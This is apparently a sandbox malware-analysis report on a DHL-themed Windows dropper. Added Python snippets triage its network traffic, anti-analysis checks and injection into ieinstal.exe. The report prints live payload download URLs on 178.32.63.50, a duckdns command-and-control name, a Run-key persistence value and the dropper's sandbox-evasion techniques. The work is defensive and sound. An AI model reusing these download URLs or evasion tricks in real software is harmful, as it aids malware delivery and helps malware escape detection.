Source: DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe |
Virustotal: Detection: 31% |
Source: DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe |
ReversingLabs: Detection: 17% |
Source: DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe |
Avira: detected |
Source: DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe |
Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED |
Source: Traffic |
Snort IDS: 2018752 ET TROJAN Generic .bin download from Dotted Quad 192.168.11.20:49806 -> 178.32.63.50:80 |
Source: unknown |
DNS query: name: septnet.duckdns.org |
Source: Joe Sandbox View |
ASN Name: TELIANETTeliaCarrierEU |
Source: Joe Sandbox View |
ASN Name: OVHFR |
Source: global traffic |
HTTP traffic detected: GET /moss/Host_AKhLBP62.bin HTTP/1.1 |
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko |
Host: 178.32.63.50 |
Cache-Control: no-cache |
Source: global traffic |
TCP traffic: 192.168.11.20:49807 -> 193.104.197.28:6577 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 178.32.63.50 |
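The Snort hit, the direct-IP GET and the "TCP traffic detected without corresponding DNS query" entry above are three views of the same download: the URL is hard-coded in the binary (the memory strings further down confirm it), so the host is contacted without any name lookup, while the duckdns name is resolved separately. As an added example, not part of the Joe Sandbox report or the sample, the Python below replays that triage over constructed records: it parses the request, applies an assumed reading of the ET "Generic .bin download from Dotted Quad" rule (GET, URI path ending in .bin, Host header an IPv4 literal; this is the logic, not the rule's text), and lists destinations that no DNS answer explained. The DNS answer mapping septnet.duckdns.org to 193.104.197.28 is assumed for the example; the report shows the query and the TCP flow to port 6577, not the resolution.

```python
"""Triage helpers for the network indicators in the report above.

Added example, not part of the sandbox report. The DNS answer for
septnet.duckdns.org is constructed for the example; the report shows the
query and the flows but not the resolved address.
"""
import ipaddress
from dataclasses import dataclass


@dataclass
class DnsAnswer:
    name: str
    addresses: list            # constructed answers, see module docstring


@dataclass
class Flow:
    src: str
    dst: str
    dport: int
    http_request: str = ""     # raw request text, empty for non-HTTP flows


def parse_http_request(raw: str):
    """Split a raw HTTP/1.x request into (method, path, headers dict)."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return method, path, headers


def is_dotted_quad(host: str) -> bool:
    """True when the Host header is an IPv4 literal rather than a name."""
    try:
        ipaddress.IPv4Address(host.split(":")[0])
        return True
    except ipaddress.AddressValueError:
        return False


def bin_download_from_dotted_quad(raw: str) -> bool:
    """Assumed reading of ET TROJAN 'Generic .bin download from Dotted
    Quad': a GET whose URI path ends in .bin and whose Host header is a
    bare IPv4 address (not the rule's exact text)."""
    method, path, headers = parse_http_request(raw)
    return (method == "GET"
            and path.split("?", 1)[0].lower().endswith(".bin")
            and is_dotted_quad(headers.get("host", "")))


def connections_without_dns(answers, flows):
    """Destinations contacted although no DNS answer ever returned them.
    A hard-coded IP in the binary is the usual cause, matching the
    http://178.32.63.50/... strings found in memory."""
    resolved = {addr for a in answers for addr in a.addresses}
    return sorted({f.dst for f in flows if f.dst not in resolved})


def triage(answers, flows):
    """Return the findings a reviewer would expect from these records."""
    findings = []
    for f in flows:
        if f.http_request and bin_download_from_dotted_quad(f.http_request):
            _, path, _ = parse_http_request(f.http_request)
            findings.append(f"bin-download-dotted-quad {f.dst}:{f.dport}{path}")
    for dst in connections_without_dns(answers, flows):
        findings.append(f"no-dns {dst}")
    return findings


# Constructed sample input reproducing the report's flows.
REQUEST = (
    "GET /moss/Host_AKhLBP62.bin HTTP/1.1\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko\r\n"
    "Host: 178.32.63.50\r\n"
    "Cache-Control: no-cache\r\n\r\n"
)
ANSWERS = [DnsAnswer("septnet.duckdns.org", ["193.104.197.28"])]  # answer assumed
FLOWS = [
    Flow("192.168.11.20", "178.32.63.50", 80, REQUEST),
    Flow("192.168.11.20", "193.104.197.28", 6577),
]

if __name__ == "__main__":
    for line in triage(ANSWERS, FLOWS):
        print(line)
```

Run against a real capture, the useful output is the second finding: a destination with no DNS explanation is a strong pivot, because the same literal address will be present in the unpacked payload and in any sibling samples.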
Source: ieinstal.exe, 00000006.00000002.318237428388.00000000035C0000.00000004.00000001.sdmp |
String found in binary or memory: http://178.32.63.50/boss/Host_AKhLBP62.bin |
Source: ieinstal.exe, 00000006.00000002.318237428388.00000000035C0000.00000004.00000001.sdmp |
String found in binary or memory: http://178.32.63.50/moss/Host_AKhLBP62.bin |
Source: ieinstal.exe, 00000006.00000002.318237025480.0000000003229000.00000004.00000020.sdmp |
String found in binary or memory: http://178.32.63.50/moss/Host_AKhLBP62.bin: |
Source: ieinstal.exe, 00000006.00000002.318237025480.0000000003229000.00000004.00000020.sdmp |
String found in binary or memory: http://178.32.63.50/moss/Host_AKhLBP62.binF |
Source: ieinstal.exe, 00000006.00000002.318237428388.00000000035C0000.00000004.00000001.sdmp |
String found in binary or memory: http://178.32.63.50/moss/Host_AKhLBP62.binhttp://178.32.63.50/boss/Host_AKhLBP62.binwininet.dllMozil |
Source: unknown |
DNS traffic detected: queries for: septnet.duckdns.org |
Source: initial sample |
Icon embedded in PE file: bad icon match: 20047c7c70f0e004 |
Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe |
Code functions: 2_2_00403DD6, 2_2_0040415B, 2_2_023018E5, 2_2_0230C119, 2_2_0230E165, 2_2_0230303C, 2_2_02304419, 2_2_02304245, 2_2_023042B5, 2_2_02304484, 2_2_0230CED6, 2_2_023036D9, 2_2_0230452C, 2_2_02303700, 2_2_02304358, 2_2_02303BBC, 2_2_02303BBE, 2_2_02302F90, 2_2_02304195, 2_2_02302F9B, 2_2_02304184 |
Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe |
Code function: 2_2_0230DC5F NtProtectVirtualMemory |
Code function: 2_2_0230C119 NtAllocateVirtualMemory |
Code function: 2_2_02307B69 NtWriteVirtualMemory |
Code function: 2_2_02307BAC NtWriteVirtualMemory |
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe |
Code function: 6_2_030CED4E NtProtectVirtualMemory |
Code function: 6_2_030CEC4F Sleep, NtProtectVirtualMemory |
Code function: 6_2_030CECBD Sleep, NtProtectVirtualMemory |
Code function: 6_2_030CED49 NtProtectVirtualMemory |
Code function: 6_2_030CED5C NtProtectVirtualMemory, NtProtectVirtualMemory |
Code function: 6_2_030CEDB8 NtProtectVirtualMemory |
Code function: 6_2_030CEE3A NtProtectVirtualMemory |
Source: DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe, 00000002.00000002.313749031092.0000000000419000.00000002.00020000.sdmp |
Binary or memory string: OriginalFilename VOLDFRELSERS.exe vs DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe |
Source: DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe |
Binary or memory string: OriginalFilename VOLDFRELSERS.exe vs DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe |
Source: DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe |
Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST |
Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe |
Section loaded: edgegdi.dll |
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe |
Section loaded: edgegdi.dll |
Source: DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe |
Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ |
Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe |
Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers |
Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe |
Section loaded: C:\Windows\SysWOW64\msvbvm60.dll |
Source: unknown |
Process created: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe 'C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe' |
|
Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe |
Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe 'C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe' |
|
Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe |
Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe 'C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe' |
Jump to behavior |
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe |
Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32 |
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe |
File created: C:\Users\user\AppData\Local\Temp\LABERT |
Source: classification engine |
Classification label: mal100.rans.troj.evad.winEXE@3/1@1/2 |
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe |
Mutant created: \Sessions\1\BaseNamedObjects\oILYSlqV |
Source: Yara match |
File source: 00000002.00000002.313750716611.0000000002300000.00000040.00000001.sdmp, type: MEMORY |
Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe |
Code function: 2_2_00409455 push es; iretd at 2_2_00409456 |
Code function: 2_2_00407E31 push ds; retf at 2_2_00407E32 |
Code function: 2_2_004072C1 push edx; retf at 2_2_004072C2 |
Code function: 2_2_00406294 push edx; retf at 2_2_00406297 |
Code function: 2_2_00406D73 push es; retf at 2_2_00406D76 |
Code function: 2_2_004099EF push esp; iretd at 2_2_004099F2 |
Code function: 2_2_00407BFF push FFFFFFA7h; iretd at 2_2_00407C53 |
Code function: 2_2_02300390 push BDC367A8h; ret at 2_2_02300383 |
Code function: 2_2_02307F80 push FFFFFFAFh; ret at 2_2_02307F93 |
Code function: 2_2_02304F84 push esi; iretd at 2_2_02304F87 |
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe |
Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Halvngen7 |
Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe |
File opened: C:\Program Files\Qemu-ga\qemu-ga.exe |
Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe |
File opened: C:\Program Files\qga\qga.exe |
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe |
File opened: C:\Program Files\Qemu-ga\qemu-ga.exe |
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe |
File opened: C:\Program Files\qga\qga.exe |
Source: ieinstal.exe, 00000006.00000002.318237428388.00000000035C0000.00000004.00000001.sdmp |
Binary or memory string: NTDLLKERNEL32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEUSER32PSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32TEMP=\CIRKUSFORESTILLINGER.EXE\LABERTSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNHALVNGEN7HTTP://178.32.63.50/MOSS/HOST_AKHLBP62.BINHTTP://178.32.63.50/BOSS/HOST_AKHLBP62.BINWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKO |
Source: DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe, 00000002.00000002.313750631050.00000000022E0000.00000004.00000001.sdmp |
Binary or memory string: NTDLLKERNEL32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEUSER32PSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32TEMP=PROGRAMFILES=\INTERNET EXPLORER\IEINSTAL.EXEWINDIR=\SYSWOW64\MSVBVM60.DLL |
Source: DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe, 00000002.00000002.313750631050.00000000022E0000.00000004.00000001.sdmp, ieinstal.exe, 00000006.00000002.318237428388.00000000035C0000.00000004.00000001.sdmp |
Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE |
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe TID: 6880 |
Thread sleep count: 9976 > 30 |
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe TID: 6880 |
Thread sleep time: -49880s >= -30000s (the unit is milliseconds: 9976 sleeps of 5 ms each, about 49.9 s in total, above the 30 s threshold) |
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe |
Thread sleep count: Count: 9976 delay: -5 |
Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe |
Code function: 2_2_02303B3F rdtsc |
2_2_02303B3F |
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe |
Window / User API: threadDelayed 9976 |
Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe |
System information queried: ModuleInformation |
Source: DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe, 00000002.00000002.313750631050.00000000022E0000.00000004.00000001.sdmp |
Binary or memory string: ntdllkernel32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exeuser32psapi.dllMsi.dllPublishershell32advapi32TEMP=ProgramFiles=\internet explorer\ieinstal.exewindir=\syswow64\msvbvm60.dll |
Source: ieinstal.exe, 00000006.00000002.318236722320.00000000031E8000.00000004.00000020.sdmp |
Binary or memory string: Hyper-V RAW |
Source: ieinstal.exe, 00000006.00000002.318237428388.00000000035C0000.00000004.00000001.sdmp |
Binary or memory string: ntdllkernel32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exeuser32psapi.dllMsi.dllPublishershell32advapi32TEMP=\Cirkusforestillinger.exe\LABERTSoftware\Microsoft\Windows\CurrentVersion\RunHalvngen7http://178.32.63.50/moss/Host_AKhLBP62.binhttp://178.32.63.50/boss/Host_AKhLBP62.binwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko |
Source: DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe, 00000002.00000002.313750631050.00000000022E0000.00000004.00000001.sdmp, ieinstal.exe, 00000006.00000002.318237428388.00000000035C0000.00000004.00000001.sdmp |
Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe |
Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe |
Thread information set: HideFromDebugger |
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe |
Thread information set: HideFromDebugger |
Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe |
Code function: 2_2_02305833 mov eax, dword ptr fs:[00000030h] |
Code function: 2_2_02305859 mov eax, dword ptr fs:[00000030h] |
Code function: 2_2_023088B5 mov eax, dword ptr fs:[00000030h] |
Code function: 2_2_023058BF mov eax, dword ptr fs:[00000030h] |
Code function: 2_2_0230CED6 mov eax, dword ptr fs:[00000030h] |
Code function: 2_2_0230599C mov eax, dword ptr fs:[00000030h] |
Code function: 2_2_0230BDCB mov eax, dword ptr fs:[00000030h] |
Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe |
Process queried: DebugPort |
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe |
Process queried: DebugPort |
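The entries from "File opened: C:\Program Files\Qemu-ga\qemu-ga.exe" down to "Process queried: DebugPort" are the sample's sandbox and debugger checks (QEMU guest-agent paths, the Hyper-V string, rdtsc timing, PEB reads via fs:[30h], HideFromDebugger, DebugPort). The figure a practitioner should note is the 9976 five-millisecond sleeps: each call is far below the threshold a sandbox uses to skip long sleeps, yet together they stall the payload for about 50 s. As an added example, not code from the report or the sample, the Python below aggregates a constructed API trace (its (api, argument) format is an assumption of the example) that reproduces those figures and flags fragmented sleeping alongside the VM-artifact probes and debugger checks.

```python
"""Summary of the anti-analysis behaviour recorded in the report above.

Added example, not part of the sandbox report. The API trace below is
constructed to match the report's figures (9976 Sleep calls of 5 ms,
the two QEMU guest-agent paths, the debugger checks); the trace format
of (api, argument) pairs is an assumption of the example.
"""

# File-system artifacts the report shows the sample probing for
# (lower-cased so the comparison is case-insensitive like NTFS).
VM_ARTIFACTS = (
    r"c:\program files\qemu-ga\qemu-ga.exe",
    r"c:\program files\qga\qga.exe",
)

# (api, argument) pairs that count as debugger detection in this trace format.
DEBUGGER_CHECKS = {
    ("NtQueryInformationProcess", "ProcessDebugPort"),
    ("NtSetInformationThread", "ThreadHideFromDebugger"),
    ("rdtsc", None),
}


def summarize_evasion(trace, sleep_threshold_ms=30_000):
    """Aggregate a list of (api, argument) pairs into an evasion summary.

    The interesting case is 'fragmented sleep': no single Sleep call
    reaches the sandbox's skip threshold, but the calls add up past it,
    so a monitor that only shortens long sleeps never sees the payload run.
    """
    sleeps = [int(arg) for api, arg in trace if api == "Sleep"]
    total = sum(sleeps)
    longest = max(sleeps, default=0)
    probed = sorted({arg.lower() for api, arg in trace
                     if api == "CreateFileW" and arg.lower() in VM_ARTIFACTS})
    checks = sorted(f"{api}:{arg}" for api, arg in set(trace)
                    if (api, arg) in DEBUGGER_CHECKS)
    return {
        "sleep_calls": len(sleeps),
        "total_sleep_ms": total,
        "max_single_sleep_ms": longest,
        # Only flag when the sum crosses the threshold but no single call does.
        "fragmented_sleep": total >= sleep_threshold_ms and longest < sleep_threshold_ms,
        "vm_artifacts_probed": probed,
        "debugger_checks": checks,
    }


# Constructed trace reproducing the report's figures.
TRACE = (
    [("Sleep", 5)] * 9976
    + [("CreateFileW", r"C:\Program Files\Qemu-ga\qemu-ga.exe"),
       ("CreateFileW", r"C:\Program Files\qga\qga.exe"),
       ("NtQueryInformationProcess", "ProcessDebugPort"),
       ("NtSetInformationThread", "ThreadHideFromDebugger"),
       ("rdtsc", None)]
)

if __name__ == "__main__":
    for key, value in summarize_evasion(TRACE).items():
        print(f"{key}: {value}")
```

The check to keep from this is the pair of numbers: total sleep above the threshold with the longest single call well below it. A sandbox that patches Sleep per call, or a detection that alerts on a single long sleep, misses exactly this pattern.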
Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe |
Code function: 2_2_02308A19 LdrInitializeThunk |
Code function: 2_2_0230E165 RtlAddVectoredExceptionHandler |
Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe |
Memory written: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 30C0000 |
Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe |
Code function: 2_2_0230CED6 LoadLibraryA, LogonUserA |
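The NtAllocateVirtualMemory, NtWriteVirtualMemory and NtProtectVirtualMemory calls, the "Memory written: ... ieinstal.exe base: 30C0000" entry (the ieinstal.exe code functions listed earlier sit at 6_2_030CExxx, inside that region) and the ieinstal.exe process created with the dropper's own path as its command line describe one injection chain, with the Run value Halvngen7 then written by the injected host. As an added example, not code from the report or the sample, the Python below correlates constructed events in a simplified Sysmon-style schema (an assumption of the example) into that chain; process numbers 2 and 6 are the report's own process indices.

```python
"""Correlation of the process-injection chain in the report above.

Added example, not part of the sandbox report. The event records below
are constructed from the report's entries (process ids 2 and 6 are the
report's own process indices); the event schema is a simplified
Sysmon-style one assumed for the example.
"""
from collections import defaultdict
from dataclasses import dataclass
import ntpath


@dataclass
class ProcessCreate:
    pid: int
    ppid: int
    image: str
    cmdline: str


@dataclass
class MemoryWrite:
    src_pid: int
    dst_pid: int
    base: int


@dataclass
class RegistrySet:
    pid: int
    key: str
    value_name: str


def first_token(cmdline: str) -> str:
    """Executable named on the command line (argv[0]), quotes stripped."""
    cmdline = cmdline.strip()
    if cmdline and cmdline[0] in "'\"":
        end = cmdline.find(cmdline[0], 1)
        return cmdline[1:end] if end > 0 else cmdline[1:]
    return cmdline.split(" ", 1)[0]


def image_cmdline_mismatch(ev: ProcessCreate) -> bool:
    """A process whose image differs from the executable its own command
    line names: the usual footprint of a hollowed or spoofed host process
    (here ieinstal.exe started with the dropper's path as argv[0])."""
    return (ntpath.basename(ev.image).lower()
            != ntpath.basename(first_token(ev.cmdline)).lower())


def injection_chains(events):
    """Return one finding per suspicious host process, linking it to the
    process that wrote into it and to any persistence the host set up."""
    procs = {e.pid: e for e in events if isinstance(e, ProcessCreate)}
    writers = defaultdict(set)            # dst_pid -> {src_pid}
    for e in events:
        if isinstance(e, MemoryWrite) and e.src_pid != e.dst_pid:
            writers[e.dst_pid].add(e.src_pid)
    findings = []
    for pid, p in procs.items():
        injectors = writers.get(pid, set())
        if not injectors and not image_cmdline_mismatch(p):
            continue
        findings.append({
            "host": p.image,
            "injected_by": sorted(procs[s].image for s in injectors if s in procs),
            "cmdline_mismatch": image_cmdline_mismatch(p),
            "persistence": [f"{e.key}\\{e.value_name}" for e in events
                            if isinstance(e, RegistrySet) and e.pid == pid],
        })
    return findings


SAMPLE = r"C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe"
HOST = r"C:\Program Files (x86)\Internet Explorer\ieinstal.exe"
RUN_KEY = r"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"

# Constructed from the report: process 2 is the dropper, process 6 the host.
EVENTS = [
    ProcessCreate(2, 1, SAMPLE, f"'{SAMPLE}'"),
    ProcessCreate(6, 2, HOST, f"'{SAMPLE}'"),
    MemoryWrite(2, 6, 0x030C0000),
    RegistrySet(6, RUN_KEY, "Halvngen7"),
]

if __name__ == "__main__":
    for finding in injection_chains(EVENTS):
        print(finding)
```

The command-line mismatch alone is enough to raise the alert; the memory write and the Run value attribute the persistence back to the dropper rather than to a signed Microsoft binary, which is where a naive per-process view would leave it.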
Source: ieinstal.exe, 00000006.00000002.318237700383.00000000039C1000.00000002.00020000.sdmp |
Binary or memory string: Program Manager |
Source: ieinstal.exe, 00000006.00000002.318237700383.00000000039C1000.00000002.00020000.sdmp |
Binary or memory string: Shell_TrayWnd |
Source: ieinstal.exe, 00000006.00000002.318237700383.00000000039C1000.00000002.00020000.sdmp |
Binary or memory string: Progman |
Source: ieinstal.exe, 00000006.00000002.318237700383.00000000039C1000.00000002.00020000.sdmp |
Binary or memory string: Progmanlock |